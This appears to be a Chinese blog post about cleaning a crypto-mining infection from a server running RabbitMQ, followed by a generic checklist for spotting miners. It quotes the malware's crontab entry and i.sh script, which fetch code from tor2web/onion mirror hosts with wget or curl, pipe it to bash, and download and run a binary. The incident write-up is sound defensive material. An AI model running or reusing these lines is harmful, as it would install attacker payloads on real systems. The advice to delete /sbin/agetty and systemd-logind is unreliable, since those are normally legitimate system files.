一次服务器中病毒挖矿事件处理

  事情是这样的,发现 RabbitMQ 服务响应非常慢,可以说是基本不响应、无法提供服务了。这时就去服务器上面查看,发现 CPU 的资源被一个叫做UxYhf8的程序严重占用。

第一次处理

  看到 CPU 飙升太高,发现这个程序也不是自己所知道的任何一个程序,所以就怀疑中挖矿病毒了。首先把这个程序给kill掉,只能先kill掉了,不然卡的都快无法操作了。

# 34534:挖矿程序的 pid
$ kill -9 34534

  这时 CPU 的资源已经被释放,RabbitMQ 服务也正常了。但是好景不长,没过几分钟就又出来一个新的未知进程IUfh8f(事后经过测试,新进程出现的时间在几分钟到几十分钟变化),这时就想到是不是有定时任务,查看定时任务:

$ crontab -e
10 * * * * (wget -qO- -U- https://ddgsdk6oou6znsdn.tor2web.io/i.sh || curl -fskL -A- https://ddgsdk6oou6znsdn.tor2web.io/i.sh || wget -qO- -U- http://ddgsdk6oou6znsdn.onion.in.net/i.sh || curl -fskL -A- http://ddgsdk6oou6znsdn.onion.in.net/i.sh || wget -qO- -U- http://ddgsdk6oou6znsdn.tor2web.me/i.sh || curl -fskL -A- http://ddgsdk6oou6znsdn.tor2web.me/i.sh || wget -qO- -U- http://ddgsdk6oou6znsdn.onion.nz/i.sh || curl -fskL -A- http://ddgsdk6oou6znsdn.onion.nz/i.sh || wget -qO- -U- http://ddgsdk6oou6znsdn.onion.ws/i.sh || curl -fskL -A- http://ddgsdk6oou6znsdn.onion.ws/i.sh)|bash

  此 i.sh 脚本内容多变,大致如一下:

# i.sh 脚本的内容是
exec &>/dev/null
if ! ps -p $(< /tmp/.X11-lock); then
    x=./.y
    wget -qU- http://malwregafeg2fdjn.tor2web.xyz/.$(uname -m) -O$x;chmod 777 $x;$x;rm -f $x
fi

  发现了这么一个定时任务。把它删掉并清理所有定时相关文件:/etc/cron.d 目录下、/var/spool/cron/ 目录下。至此结束(自认为结束)。

第二次处理

  在第一次处理的结果上发现过段时间,挖矿程序又出现了。这是知道问题没有那么简单。可能还残留病毒文件。最后找到几个病毒程序,如下:

/usr/lib/systemd/systemd-logind
/sbin/agetty
/sbin/agetty
$ ps aux | grep -v grep | grep "agetty"
root     26432  0.0  0.0 110044   824 tty1     Ss+  15:15   0:00 /sbin/agetty --noclear tty1 linux
root     26434  0.0  0.0 110044   784 ttyS0    Ss+  15:15   0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220
$ ps aux | grep -v grep | grep "systemd-logind"
root       502  0.0  0.0  24204  1680 ?        Ss    2018   0:52 /usr/lib/systemd/systemd-logind
  1. 先删掉病毒文件
  2. 杀死病毒程序,一定要多执行几次,我执行了好几次才杀掉。
$ ps aux | grep -v grep | grep "agetty" | awk '{print $2}' | xargs kill -9 && ps aux | grep -v grep | grep "systemd-logind" | awk '{print $2}' | xargs kill -9

  至此,完全搞定。

服务器挖矿病毒是指黑客通过入侵服务器,利用服务器的计算资源进行加密货币挖矿。这种病毒的存在会导致服务器性能下降,甚至导致服务器崩溃。以下是排查服务器挖矿病毒的过程。 1. 检查CPU和内存使用率 服务器挖矿病毒会占用服务器的大量计算资源,导致CPU和内存使用率异常升高。通过检查系统监视器或者运行top命令,可以查看当前的CPU和内存使用率,如果发现异常升高,则很可能是服务器挖矿病毒导致的。 2. 检查网络流量 服务器挖矿病毒需要与矿池进行通信,因此会产生大量的网络流量。通过检查网络监视器或者运行iftop命令,可以查看当前的网络流量,如果发现异常升高,则很可能是服务器挖矿病毒导致的。 3. 检查进程列表 服务器挖矿病毒会在服务器上运行挖矿程序,因此会在进程列表留下痕迹。通过运行ps命令,可以查看当前的进程列表,如果发现有可疑的进程,则很可能是服务器挖矿病毒导致的。 4. 检查系统日志 服务器挖矿病毒会在服务器上留下痕迹,因此可以通过检查系统日志来发现异常行为。通过查看/var/log/auth.log、/var/log/syslog等系统日志文件,可以查找异常登录或者异常命令执行的记录,如果发现可疑行为,则很可能是服务器挖矿病毒导致的。 5. 检查防火墙日志 服务器挖矿病毒需要与矿池进行通信,因此需要打开服务器的防火墙端口。通过检查防火墙日志,可以查看服务器上的网络连接情况,如果发现与矿池的连接,则很可能是服务器挖矿病毒导致的。 以上是排查服务器挖矿病毒的基本过程,如果发现服务器确实感染了挖矿病毒,则需要及时采取措施清除病毒,并加强服务器的安全防护措施,避免类似的攻击再次发生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值